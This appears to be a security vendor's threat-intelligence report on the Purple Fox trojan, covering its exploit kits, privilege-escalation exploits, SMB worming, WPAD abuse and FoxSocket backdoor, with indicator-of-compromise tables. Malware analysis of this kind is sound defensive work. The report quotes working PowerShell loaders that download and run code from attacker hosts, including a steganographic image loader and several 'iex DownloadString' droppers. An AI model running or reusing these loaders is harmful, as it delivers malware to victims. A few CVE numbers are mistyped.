Ben Helps, Murray Crossan and Calum Stewart
105 min read

Introduction

The trojan known as Purple Fox was first discovered by 360 Total Security on September 25th 2018. At the time of publishing, the statistics they had gathered estimated that over thirty-thousand (30,000) users were affected by the malware. Since its debut, there have been a number of updates and additions to Purple Fox that have ensured it has remained notable in the threat landscape.   This report aims to provide an overview of everything currently known regarding Purple Fox and the various changes and additions to its functionality over time.

Subscribe to our Blog

This report aims to provide an overview of everything known regarding Purple Fox and the various changes and additions to its functionality over time. 

  1. First sighting of Purple Fox (2018-09-25)

  2. Leveraging Powershell (2019-09-09)

  3. Purple Fox Exploit Kit (2020-07-05)

  4. New privilege escalation exploits (2020-10-19)

  5. Spreading through SMB (2021-03-24)

  6. CVE-2021-26411 (2021-04-14)

  7. Purple Fox exploits WPAD (2021-07-01)

  8. PrintNightmare vulnerabilities (2021-07-25)

  9. FoxSocket Backdoor (2021-10-19)

  10. SQL Server Crypto-mining (2021-12-13)

  11. Dropping Purple Fox with fake Telegram Installer (2022-01-03)


First sighting of Purple Fox (2018-09-25)

The first reported instance of Purple Fox was in an analysis carried out by 360 Total Security (360 Total Security, 2018) examining a trojan that drops itself using an MSI installation package, and alters registry values to replace a legitimate Windows system file.

The initial stage of infection often relies on a third party Exploit Kit (EK) called RIG EK. Victims browse to compromised or malicious websites hosting the EK which then drops the malware onto the victims system. The initial dropper is an installation package created using Nullsoft Scriptable Install System (NSIS).

The built-in Windows installer msiexec.exe is leveraged to run the installation package retrieved from the website. The installation package in turn drops two files into the Windows directory: winupdate64.log, a malicious DLL that acts as a loader and sysupdate.log, the payload of the malware. 

The installer then changes the value of the registry key PendingFileRenameOperations, located at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager. As a result of this change, when the system next boots the Windows Session Manager (smss.exe) will read the altered registry value and follow the instructions that have been added. This involves moving the Windows System Event Notification Service (SENS) module sens.dll to a new location, renamed as C:\Windows\AppPatch\Acpsens.dll. The winupdate64.log file is then moved from its original location and renamed as C:\Windows\System32\sens.dll. The sysupdate.log file is also renamed and relocated to the path  C:\Windows\AppPatch\Ke990129.xsl,  the file name potentially varying across variants of the malware.

The malicious DLL winupdate64.log, now renamed as sens.dll, is loaded in place of the original system file with system-level privileges and decrypts and executes the contents of the payload  (Ke990129.xsl/sysupdate.log), which consists of a DLL and a rootkit driver. 

The decrypted payload contents are saved to the System32 directory and then loaded into a spawned but suspended svchost.exe process. The driver is saved as C:\Windows\System32\dump_{random hex values}.sys while the DLL file is saved as C:\Windows\System32\Ms{random hex values}App.dll.  As final steps the malicious sens.dll is deleted and the original sens.dll is restored to its original name and location.   After infection, Purple Fox is often used to retrieve and deploy other types of malware, commonly cryptocurrency mining malware.

Indicators of Compromise

Type

Indicator

Relevance

IP Addresses

216.250.99.5

[Missouri, US]

The dropper domain for the malicious installation package.

File Names

wpltbbrp_011up.jpg

Malicious MSI installation package.

winupdate64.log

Loader DLL dropped by installer.

sysupdate.log

Payload dropped by installer.

Paths

C:\\Windows\System32\

Multiple dropped files are copied to this directory.

C:\\Windows\AppPatch\

Replaced system file (sens.dll) is moved to this directory.

MITRE Techniques

ID

Technique

Context

T1036

Masquerading

One of the files dropped by the installer is renamed and placed in the location of a legitimate Windows system file (sens.dll).

T1569

System Services

By altering registry values, Purple Fox is able to leverage Windows System Manager (smss.exe) to replace a system file with a malicious loader, which is then automatically run by Windows.

T1218

Signed Binary Proxy Execution

msiexec.exe is used to execute the malicious installation package which drops the malware. As msiexec.exe is signed and native it can be used to bypass application control systems.

 

Leveraging Powershell (2019-09-09)

Where Purple Fox previously relied on NSIS-compiled installers to drop and execute its components, Trend Micro have since analysed a new version of the malware which makes use of Powershell instead (Trend Micro, 2019). This allows Purple Fox the capability of fileless infection. Trend Micro also reported additional privilege escalation vulnerabilities being leveraged to increase the likelihood of a successful infection .

Once a user accesses a malicious web page hosting the RIG exploit kit the user is redirected to a malicious Powershell script, masquerading as a .jpg image file, which either directly downloads Purple Fox’s main component or attempts to escalate privileges. The following vulnerabilities can be exploited in order to execute the malicious Powershell script:

  • A flash (.swf) file exploits CVE-2021-15982 leading to the execution of the malicious Powershell script.
  • An .htm file that exploits CVE-2014-6332 leading to the execution of a malicious Powershell script.
  • An .htm file that exploits CVE-2018-8174 which redirects to a malicious HTML application (.hta) file, which then executes the malicious Powershell script.

If the current user does not have administrator privileges, Powersploit modules will be used in an attempt to gain elevated privileges. These Powersploit modules specifically target flaws in the Win32k driver, CVE-2015-1701 and CVE-2018-8120.

Once the script has gained administrative privileges it then proceeds to retrieve and execute a malicious Microsoft Installer (.msi) package, also masquerading as an image file, by leveraging the application programming interface (API) of msi.dll. As with the previous version of Purple Fox analysed, this results in msiexec.exe downloading and running the installer file and the infection chain continuing as previously detailed.

One significant difference from previous versions of Purple Fox is the use of open source code, named hidden (3. Kornev, 2019), to enable its rootkit components. This code allows Purple Fox to hide both registry keys and files from detection methods.

Indicators of Compromise

Type

Indicator

Relevance

MD5 Hashes /

File Names



4facb81f57e515a508040270849bcd35

1808164.jpg

CVE-2018-8120 exe exploit file (64 bit). Dropped by Powersploit module.

3fe38271b009298b4cb0b01ef57edbf3

1808132.jpg

CVE-2018-8120 exe exploit  file (32 bit). Dropped by Powersploit module.

B43442df320d1f89defd772991b6335c

1505132.jpg 

CVE-2015-1701 exe exploit file. Dropped by Powersploit module.

1b213242972094fbc04160d9d6bc74f9

MsE7DEA78AApp.dll

Purple Fox main component dll. Downloaded via malicious Powershell script.

ae3e7304122469f2de3ecbd920a768d1

1603264.jpg

CVE-2015-1701 exe exploit file. Dropped by Powersploit module.

fd6236ef6a96c1acf05bae3874ff6326

1.htm-1

CVE-2018-8174 .htm exploit file. Dropped by Rig EK.

2b75d6eb8626a0d8a7b67744dd2f3b84

2.htm-1

CVE-2014-6332 .htm exploit file. Dropped by Rig EK.

a875e14f20afb3a8e37e1447d920466e

pe.jpg

Powersploit Module

6467874d952a5ffc1edfd7f05b1cc86d

1505164.jpg

CVE-2015-1701 exe exploit file. Dropped by Powersploit module.

beac6592dbd3a479a64789e43ec20f27

1603232.jpg

CVE-2015-1701 exe exploit file. Dropped by Powersploit module.

5009e9fc94b07ad93374ac920711bc73

1.swf

CVE-2018-15982 .swf (flash) exploit file. Dropped by Rig EK.

 

Type

Indicator

Relevance

IP Addresses

http[:]//141[.]98[.]216[.]130/1808164[.]jpg

URL hosting CVE-2018-8120 exploit exe (64 bit)

http[:]//141[.]98[.]216[.]130/1603264[.]jpg

URL hosting CVE-2015-1701 exploit exe (32 bit)

http[:]//141[.]98[.]216[.]130/1505164[.]jpg

URL hosting CVE-2015-1701 exploit exe (64 bit)

http[:]//141[.]98[.]216[.]130/1808132[.]jpg

URL hosting CVE-2018-8120 exploit exe (32 bit)

http[:]//141[.]98[.]216[.]130/1603232[.]jpg

URL hosting CVE-20150-1701 exploit exe

http[:]//141[.]98[.]216[.]130/1505132[.]jpg

URL hosting CVE-20150-1701 exploit exe

http[:]//141[.]98[.]216[.]130/pe[.]jpg

URL hosting Powersploit privilege escalation module 

URL

http[:]//jeitacave[.]org/ps004[.]jpg

URL hosting malicious Powershell script

Domain Name

http[:]//nw[.]brownsine[.]com/

URL hosting Rig Exploit Kit

http[:]//zopso[.]org/

URL hosting Rig Exploit Kit

MITRE Techniques

ID

Technique

Context

T1189

Drive-by Compromise

Purple Fox uses the Rig exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks.

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes Powershell commands to download it’s main payload.

T1068

Exploitation for Privilege Escalation

Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

T1014 

Rootkit

Purple Fox uses an open source rootkit to hide the files and registry entries it creates.

 

Purple Fox Exploit Kit (2020-07-05)

On July 7th 2020 Proofpoint detailed how Purple Fox no longer relied on the RIG exploit kit (EK) to deliver its exploits (Proofpoint, 2020). Development of a new EK, dubbed Purple Fox EK, had allowed Purple Fox to continue integrating new exploits into its arsenal. That report also details the addition of vulnerabilities CVE-2020-0674 and CVE-2019-1458, a scripting engine memory corruption vulnerability in Internet Explorer and local privilege elevation vulnerability respectively, into the Purple Fox EK.

In the case of CVE-2020-0674 the Purple Fox EK targets the RegExp function within the jscript.dll file utilised by Internet Explorer. In doing so Purple Fox EK is able to import the functions GetModuleHandleA, GetProcAddress and VirtualProtect from kernel32.dll, allowing the exploit to load and trigger shellcode provided by the EK. Once the shellcode is triggered a new process is created using the function WinExec which runs the command mshta <payload url>, downloading and executing a malicious .hta file on the victim's system.

The final payload is the same as documented in 360 Total Security's initial report (360 Total Security, 2018), and  in the first section of this overview. Below is documentation on differences in the initial staging of the payload and other new observations.

The .hta file first uses Windows Management Instrumentation (WMI) to query the current Operating System (OS) version and will attempt to run the payload differently depending on the Major Version that is returned. It then creates a Wscript.Shell object which is used to execute the next steps:

  • If the OS is either Windows XP or Windows Vista, the .hta executes the command msiexec /i <payload url> via the Wscript.shell object.
  • If the OS is Windows 7 or any other version not specified, the .hta file uses Powershell to execute the command msiexec /i <payload url> via the Wscript.shell object

When executing the command via Powershell, if the current user does not have administrator privileges the script will attempt to gain admin privileges using local privilege escalation exploits. Purple Fox has previously been observed exploiting CVE-2018-8120 and CVE-2015-1701 via PowerSploit (documented in the previous section), however this mid-2020 version of the malware also contains a more recent privilege escalation exploit, CVE-2019-1458. Once administrator privileges are obtained, the .hta file will execute the commands documented above.

These commands download and execute a remote .msi file which contains encrypted shellcode as well as 32 and 64 bit versions of the payload. 

Indicators of Compromise

Type

Indicator

Relevance

Domain Names

casestudybuddy[.]club

URL which redirects vulnerable users to a domain hosting the Purple Fox EK

shiory[.]annebruce[.]xyz

Purple Fox EK Host

MD5 Hashes / File Names

3c3a5335282a5a9c73207a154002be28

hso9ygwhapvkpcgp1.hta

Purple Fox .hta Payload Stager

URLs

https[:]//raw.githack[.]xyz/SdTC8df7vmDNIUuV1.jpg

Purple Fox MSI Payload Stager

https[:]//raw.githack[.]xyz/1DHRBFPLZTEQRRBUB.jpg

Purple Fox MSI Main Component

https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/pe.jpg

PowerSploit Functions

https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1905864.jpg

64-bit exploit for CVE-2019-1458

https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1808132.jpg

32-bit exploit for CVE-2018-8120

https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1808164.jpg

64-bit exploit for CVE-2018-8120

https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1505132.jpg

32-bit exploit for CVE-2015-1701

https[:]//rawcdn.githack[.]com/yfaOp/BEFzQ/7d0f5914392dc9688c67a2118aefafc958cb53b2/1505164.jpg

64-bit exploit for CVE-2015-1701

MITRE Techniques

ID

Technique

Context

T1189

Drive-by Compromise

Purple Fox uses the Purple Fox Exploit Kit exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks.

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes Powershell commands to download a malicious .msi file.

T1068

Exploitation for Privilege Escalation

Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges.

T1218.005

Signed Binary Proxy Execution: Mshta

Purple Fox uses mshta.exe to execute malicious .hta files on target systems.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious.msi file which drops the main components of the malware.

 

New privilege escalation exploits (2020-10-19)

Over the years the exploitive techniques of Purple fox have improved substantially. Previous versions of the malware downloaded exploits for Local Privilege Escalation (LPE) vulnerabilities in the form of binary files renamed with image file extensions, such as update.jpg. As this technique is easily detected by antivirus and endpoint security solutions a new method was devised. The version of Purple Fox detailed in SentinelOne's analysis (13. Sentinel Labs, 2020) instead retrieves actual image files that contain the exploits embedded within them using steganography. The following PowerShell command is used to download one of the images and extract and execute the embedded LPE payload contained within:

$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a 

System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3"));

$o=a Byte[] 589824;

(0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_);

$o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};

IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))'

IEX ($uyxQcl8XomEdJUJd)

SentinelOne also reported that two additional LPE exploits were being used by Purple Fox: CVE-2020-1054 and CVE-2019-0808. Their analysis traced the exploit binaries used to public GitHub repositories. Most notably it was discovered that these exploits set and check the value StayOnTop within the registry key HKCU\Software\7-zip in order to determine if the payload was successfully executed. This key value is not used by the legitimate 7-Zip software, providing a consistent indicator of compromise for the execution of the exploits and Purple Fox infection.

Purple Fox's code obfuscation has also been improved by using VMProtect to pack the msi files downloaded by the dropper. This makes reverse engineering the code much more complicated. However, the report indicates that the payload portion of Purple Fox has not changed substantially and still employs similar methods, such as using the open source hidden project as its rootkit, as previous versions of the payload.

Indicators of Compromise

Type

Indicator

Relevance

Domain Names

speedjudgmentacceleration[.]com

rawcdn[.]githack[.]cyou

dl[.]gblga[.]workers.dev

dl[.]fmhsi[.]workers.dev

Domains hosting the Purple Fox Exploit Kit.

MD5 Hashes / File Names

c82fe9c9fdd61e1e677fe4c497be2e7908476d64 CVE-2019-1458.exe

e43f98c0698551f997649c75a2bfe988f72060c0 CVE-2020-1054.exe

82af45d8c057ef0cf1a61cc43290d21f37838dd1 cve_2019_0808.exe

6cac8138f1e7e64884494eff2b01c7b1df83aef2 rootkit_from_cve_2019_0808.msi

e65c1a74275e7099347cbec3f9969f783d6f4f7d cve_2019_0808.ps1

bdeed6792463713806f39c3b5abc0d56f176e88f key1.bin

921d1beb3c48b03e20ba1ea07ea1c8f8fc97ec8e key2.bin

2c5c07c969dd715d0e696f8a8e9e6754a9114d4e key3.bin

5a680f659c91870a819ede06746f21282a4929d1 key4.bin

60f2624c39f61ec6c2eff09d463ca57d9a227b9b key5.bin

bd00f0e6e8cbe0b486fe0aad9e6e38ea606f7044 key6.bin

9ba5e84fccf1012343ba72e9584c6af3beb8b361 key7.bin

57b4eac452c2e8c73222d0915a97a63b43d391de key8.bin

57b4eac452c2e8c73222d0915a97a63b43d391de key9.bin

c21b1397d25ece8221e981eb5289c592f71ab4ca rootkit_encrypted_payload

0470d80daf464b5ea5ee80e2db18e0582f6dbfaf rootkit_x86

bc9766d405913a6162d3747a5a7d0afe1857ac88 rootkit_x64

Example of malicious files, either the malware itself or related such as additional files dropped by the malware.

MITRE Techniques

ID

Technique

Context

T1189

Drive-by Compromise

Purple Fox uses the Purple Fox Exploit Kit exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks.

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes powershell commands to download a malicious .msi file.

T1068

Exploitation for Privilege Escalation

Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges.

T1218.005

Signed Binary Proxy Execution: Mshta

Purple Fox uses mshta.exe to execute malicious vbscript code on target systems.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

T1027.003

Obfuscated Files or Information: Steganography

Jpeg files are downloaded via Powershell which contain local privilege escalation exploit code.

T1027.002

Obfuscated Files or Information: Software Packing

Purple Fox uses the VMProtect software to pack its rootkit.

T1112

Modify Registry

Purple Fox will check for a registry value named “StayOnTop” under the HKCU:\Software\7-Zip key. This is done to determine if the payload ran successfully, suggesting that Purple Fox modifies the registry entry.

T1014 

Rootkit

Purple Fox uses an open source rootkit to hide the files and registry entries it creates.

 

Spreading through SMB (2021-03-24)

Further investigation of Purple Fox over time led to the identification of a new spreading mechanism via the exploitation of Server Message Block (SMB) protocol (6. Guardicore, 2021). In addition, the malware appeared to use compromised systems as hosts for the Purple Fox payloads which would then be used to infect other systems. This method of infection allows for Purple Fox to spread without any user action, akin to a worm, where previous methods relied on victims falling for phishing attacks.

Access to compromised systems is achieved through scanning for exposed SMB ports (port TCP445), and initiating brute force attacks against the target hosts authentication systems. In the event that access is gained the malware establishes persistence by creating a service on the compromised system utilising the naming convention AC0{x}, where x represents an integer between one (1) and nine (9). The newly created service is responsible for iterating through a list of dropper URLs for the Purple Fox MSI installer. The msiexec.exe process is executed with the /i flag to install from a remote host, and the /Q flag to run without any user prompts, obscuring the operation.

During the installation process, in which the payload is deployed and executed, the malware also modifies the Windows firewall by utilising native utility netsh.exe. A new policy named ‘Qianye’ is added, with a filter (titled ‘Filter1’) to prohibit inbound traffic from all external IP addresses on ports 445, 139 and 135 (TCP and UDP). This is likely done to prevent reinfection or infection from a different attacker. An IPv6 interface is also installed on the system to later allow the malware to port scan IPv6 addresses.

After the malware has been installed and the system restarted, the malware will continue the cycle of infection by attempting to propagate from the infected machine through SMB by port scanning other devices and brute forcing authentication.

Indicators of Compromise

Type

Indicator

Relevance

IP Addresses

57.167.200.174

120.253.201.237

65.222.221.216

65.113.192.79

77.236.130.107

180.68.57.112

95.161.197.174

60.174.95.143

115.230.127.107

Purple Fox C2 Servers

Domain name

rpc.1qw.us

Purple Fox C2 Server

File names

Winupdate64.dll

winupdate32.dll

64bit and 32bit DLL payloads dropped by the malicious installer.

Service names

AC0x

Service created to drop and execute Purple Fox. Follows naming convention where ‘x’ represents a value between one (1) and nine (9).

MITRE Techniques

ID

Technique

Context

T1021.002

Remote Services: SMB/Windows Admin Shares

Purple Fox will brute force vulnerable SMB services to gain initial access.

T1110.001

Brute Force: Password Guessing

Purple Fox uses brute force password attacks to gain access to SMB services

T1543.003

Create or Modify System Process: Windows Service

The worm payload creates a new service to download further malware payloads.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

T1562.004

Impair Defences: Disable or Modify System Firewall

A firewall rule is created to limit the systems exposure to other attackers

T1014 

Rootkit

Purple Fox uses an open source rootkit to hide the files and registry entries it creates.

T1046

Network Service Scanning

Purple Fox will IP ranges on port 445 to discover any further exposed SMB services to exploit. 

 

CVE-2021-26411 (2021-04-14)

On April 4th 2021, HP Wolf Security carried out an investigation on a new sample of Purple Fox (7. HP Wolf Security, 2021). They discovered that it had enhanced its initial exploitation abilities through the addition of an exploit for CVE-2021-26411, another memory corruption vulnerability in Internet Explorer.

The code used by Purple Fox to exploit this vulnerability closely matches that of a proof of concept (POC) released by security researchers at Enki (8. Enki, 2021). The exploit is obfuscated in several layers and encrypted using Advanced Encryption Standard (AES), however, once the researchers were able to recover the source code they noted that the only major difference between the Enki POC and the exploit used by Purple Fox was the length of the shellcode, with the Purple Fox shellcode being several times longer than that used in the Enki POC.

As seen in previous Purple Fox infections, the initial exploitation takes place via drive-by-compromise. In this case, victims entering a search term into google visited a web page that redirects to a site hosting the Purple Fox Exploit Kit (EK).

Unlike previously observed variants of the Purple Fox EK, this variant uses geofencing to ensure that users from certain regions are not redirected to the EK, users from the UK, USA, France, Germany and the Netherlands were not targeted. However, users from Italy, Switzerland, Ireland, Sweden and Japan would be redirected and exploited if their browsers were vulnerable.

Similar to the exploit chain of Purple Fox detailed in previous sections of this report, the initial stage of the malware exploits the mshta utility to download and execute a malicious Powershell script. Once executed, if the user does not have administrative privileges, several Powershell vulnerabilities can be utilised to gain elevated privileges before the installation of the Purple Fox msi malware file.

Indicators of Compromise

Type

Indicator

Relevance

Domain Names

www.loislandgraf[.]us

www.healthier-patriot[.]shop

iauisdoenki[.]xyz

eyoruas.iauisdoenki[.]xyz

veoipc.ahntncaiiribi[.]xyz

ahntncaiiribi[.]xyz

cnghfekiutetw[.]xyz

iauisdoenki[.]xyz

ktecydnn[.]xyz

vmendehep[.]xyz

ktecydnn[.]xyz

broad-block-d151.weteon.workers[.]dev

plain-forest-2233.ethcrartb.workers[.]dev

shy-feather-00c8.itttsfbir.workers[.]dev

summer-shadow-5f60.oryfannne.workers[.]dev

rawcdn.githack[.]net

A relevant domain such as a malicious domain the malware is dropped from.

MD5 Hashes / File Names

0fea69bc3003014f7869120226645a88

example.xlsm

Example of malicious files, either the malware itself or related such as additional files dropped by the malware.

MITRE Techniques

ID

Technique

Context

T1189

Drive-by Compromise

Purple Fox uses the Purple Fox Exploit Kit exploit kit to target vulnerable versions of Windows internet explorer to download malicious files in drive-by compromise attacks.

T1218.005

Signed Binary Proxy Execution: Mshta

Purple Fox uses mshta.exe to execute malicious vbscript code on target systems.

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes powershell commands to download a malicious .msi file.

T1068

Exploitation for Privilege Escalation

Purple Fox uses several PowerSploit modules to exploit various Powershell vulnerabilities and gain administrator privileges.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

T1027.003

Obfuscated Files or Information: Steganography

Jpeg files are downloaded via Powershell which contain local privilege escalation exploit code.

 

Purple Fox exploits WPAD (2021-07-01)

On July 1st 2021 Trend Micro published an analysis of Purple Fox attacks making use of Web Proxy Auto-Discovery Protocol (WPAD) domains as yet another method of infecting users with the malware (9. Trend Micro,2021). Despite the fact that WPAD attacks are well documented and the vulnerability has existed for a significant amount of time, it is still considered a viable attack technique.

WAPD is an automatic discovery protocol that locates browser configuration files on a local network. Because the domains used to locate the files are also capable of being interpreted as external domains if queried on public Domain Name System (DNS) servers, attackers can register matching domains and use them to serve malware (12. Sophos, 2016).

Targets of the malware appeared to be accessing the wpad.id domain which is situated in Indonesia based on the top level domain, i.e .id. As it stands no other countries have been found to be targeted by the malware. By implementing this technique a zero click attack, an attack that does not require user interaction, could be executed, as the WPAD URL would be accessed whenever the system is started.

To take advantage of and exploit the WPAD protocol, the Purple Fox creators registered the wpad.id domain using Cloudflare. The URL is then loaded for WPAD services, located at http://wpad[.]id/wpad[.]dat.  Once the URL is loaded it returns a Javascript version of the Internet Explorer remote code execution vulnerability CVE-2019-1367 with customised shellcode.  

The shellcode downloads the next part of the attack chain from the URL http://9kf[.]me/in[.]php?id=1.  It has been reported that the domain 9kf.me is no longer accessible but alternative domains 2kf.me and 6kf.me were active at the time of the publication of Trend Micro’s report and were observed to serve the same payload. Cloudflare servers are used to proxy the domain resolution and access to the attack chain artefacts. In their analysis of the attack chain Trend Micro observed exploits for the privilege escalation vulnerabilities CVE-2020-1054, CVE-2018-8120 and the vulnerability disclosed in MS15-051. It was found that the binary that was used to exploit MS15-051 contains a reference in a symbol file path to K8Team, which is notable as K8Team are responsible for updating and maintaining CVE exploits and different hack tools.

Indicators of Compromise

Type

Indicator

Relevance

URLs

http[:]//2kf[.]me/in[.]php

http[:]//6kf[.]me/in[.]php

http[:]//9kf[.]me/in[.]php

 

MD5 Hashes /

File Names

b2817912893fca1e95668e1add566402

1808132.jpg

CVE-2018-8120 exploit exe

b43442df320d1f89defd772991b6335c 

1505132.jpg

CVE-2015-1701 exploit exe

pe_1

3d94be7162902bde5973c1055b346b51

CVE-2019-0808 exploit exe

Winupdate32.log

dd0ce41fac1c5a1cc80e3faa53bb9d69

Purple Fox rootkit component

MITRE Techniques

ID

Technique

Context

T1189

Drive-by Compromise

Purple Fox utilises WPAD protocol to deliver a malicious javascript exploit which acts as a dropper for further malware.

 

PrintNightmare vulnerabilities (2021-07-25)

In July of 2021 it was discovered that a new proof of concept for a Windows remote printer vulnerability was accidentally disclosed. This vulnerability was dubbed PrintNightmare and appears to work on multiple fronts.  Exploiting the vulnerability can allow a user to perform remote code execution through the Windows Print Spooler service and launch attacks on other systems in a local network. In addition, as the arbitrary code is run with SYSTEM level privileges, it also serves as a local privilege escalation vulnerability and could allow attackers to gain control over high level systems such as Domain Controllers.

Shortly after this initial vulnerability was discovered it was revealed that PrintNightmare can affect almost every standard modern Windows version. The vulnerability was recognised officially as CVE-2021-34527. An article produced by 360 Total Security (10. 360 Total Security, 2021) found that Purple Fox’s botnets were using PrintNightmare to launch attacks in a cryptocurrency mining campaign.  

Following the compromise of a system, reported to be accomplished through brute force attacks against MsSQL databases, Purple Fox injects a malicious Dynamic link library named AwNKBOdTxFBP.dll into the Windows print spooler service spoolsv.exe. From spoolsv.exe the dll then injects malware into rundll32.exe and then uses Powershell to download and execute the malware on the system. At which point the victim system becomes another node in the Purple Fox botnet, carrying out cryptocurrency mining operations while attempting to move laterally and compromise other systems in the network.

Indicators of Compromise

Type

Indicator

Relevance

URLs

hxxp://6kf[.]me/dl.php

URL hosting a malicious msi file.

MD5 Hashes / File Names

45c3f24d74a68b199c63c874f9d7cc9f

45c3f24d74a68b199c63c874f9d7cc9f.virus

Meterpreter File

bc625f030c80f6119e61e486a584c934

bc625f030c80f6119e61e486a584c934.virus

Meterpreter File

MITRE Techniques

ID

Technique

Context

T1210

Exploitation of Remote Services

Purple Fox exploited the Windows Print Spooler service to execute code on remote systems.

T1055.001

Process Injection: Dynamic-link Library Injection

Purple Fox injects a malicious DLL into shell32.dll process which spawns a malicious Powershell process.

T1059.001 

Command and Scripting Interpreter: PowerShell

Purple Fox invokes Powershell commands to download a malicious .msi file.

T1218.007

Signed Binary Proxy Execution: Msiexec

Msiexec.exe is used to execute a malicious .msi file which drops the main components of the malware.

 

FoxSocket Backdoor (2021-10-19)

In October 2021 Trend Micro published a report detailing a new Purple Fox backdoor called FoxSocket, which uses WebSockets to communicate with its command-and-control (C2) servers (14. Trend Micro, 2021). The backdoor was discovered during analysis of a compromised server.

The infection chain observed was similar to previous Purple Fox infections. A drive-by compromise leads to the execution of a malicious Powershell script which executes further scripts to elevate privileges if required. The payload is then executed, dropping two components, dbcode21mk.log and setupact64.log, to the Windows directory. Registry values under the  HKLM\SYSTEM\CurrentControlSet\Control\Session Manager key are then set to move and replace sens.dll with setupact64.log upon system restart.  Some time after infection, the dropper for FoxSocket is retrieved by Purple Fox using the following Powershell commands:

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))"

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))"

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))"

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))"

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))"

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))"

"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))"

The payload URLs in the commands serve two variants of an additional Powershell script that downloads the backdoor:

$_0000 = 0

while($_0000 -1t 16)

$_0001 =(new-object net.webclient).DownloadData('hxxp[:]//185.112.144.245/a/data')

$_0002 =[System.Reflection.Assembly]::Load($_0001)

$_0003 = $_0002.EntryPoint

[string[]] $_0004 = @(BASE64_Encoded_Data)

[Object[]] $_0005 = @(, $_0004)

$_0003.Invoke($_0006, $_0005)

$_0000++

sleep 5

The two variants differ in the Base64 encoded data passed as an argument to the object downloaded from the remote server and invoked by the dropper. The data consists of configuration parameters used to choose a C2 server and set up a communications channel. Historical analysis by Trend Micro revealed that the number of available subdomains for the C2 server had increased significantly from earlier iterations of the backdoor.

The WebSocket communications used by FoxSocket allow for a bidirectional channel to be established between the victim and the C2 server.

Communication with the C2 server is established and the connection is maintained by sending keepalive messages, which prevents the connection from being closed due to inactivity. Messages are then exchanged between the victim and the C2 server to negotiate an end-to-end encrypted session. The final step involves the victim machine sending information such as username, machine name, local IP address, MAC address and Operating System version to the C2 server to establish a profile and then listening for further instructions. Trend Micro were able to discern the following commands that were observed to be sent from the C2 server:

Command code

Functionality

20

Send the current date on the victim machine

30

Retrieve results of DriveInfo.GetDrives() for all drives

40

Retrieve results of DirectoryInfo() for a specific directory

50

Retrieve results of  FileInfo() for a specific file

60

Perform recursive directory search

70

Execute WMI queries using ManagementObjectSearcher()

80

Close the WebSocket Session

90

Exit the process

100

Spawn a new process

110

Download data from a specific URL to the victim machine

120

DNS lookup from the victim machine

130

Retrieve file contents of a specific file

140

Write data to a specific location

150

Download data and write to a specific file

160

Renegotiate session key for symmetric encryption

180

Get current process ID/Name

210

Return the configuration parameter for the backdoor

220

Kill the process and start a new process with a different config

230

Kill process with a specific PID

240

Query internal backdoor object properties

260

Retrieve hash values of specific files

270

Kill multiple processes with list of specific PIDs

280

Delete list of specific files/directories

290

Move list of specific files/directories to another location

300

Create a new directory in a specific location

Indicators of Compromise

Type

Indicator

Relevance

Domain Names

57.167.200.174

120.253.201.237

65.222.221.216

65.113.192.79

77.236.130.107

180.68.57.112

95.161.197.174

60.174.95.143

115.230.127.107

Purple Fox C2 Servers

IP Address

93.95.226.157

93.95.227.183

93.95.228.163

185.112.144.101

185.112.146.72

185.112.146.83

185.112.147.50

Purple Fox C2 Servers

MD5 Hashes / File Names

14e25a99d192da7cc611d3288948238d
PS1

99b7092694b67ad60dc66251f68f13a6
PS1

Malicious PowerShell scripts

MD5 Hashes / File Names

243aa234a8aabc58f964913f6f30d925

Client_net_framework.exe

e4a7e1af290d1de580fb8e1bf8b22e1e

Client_net_framework.exe

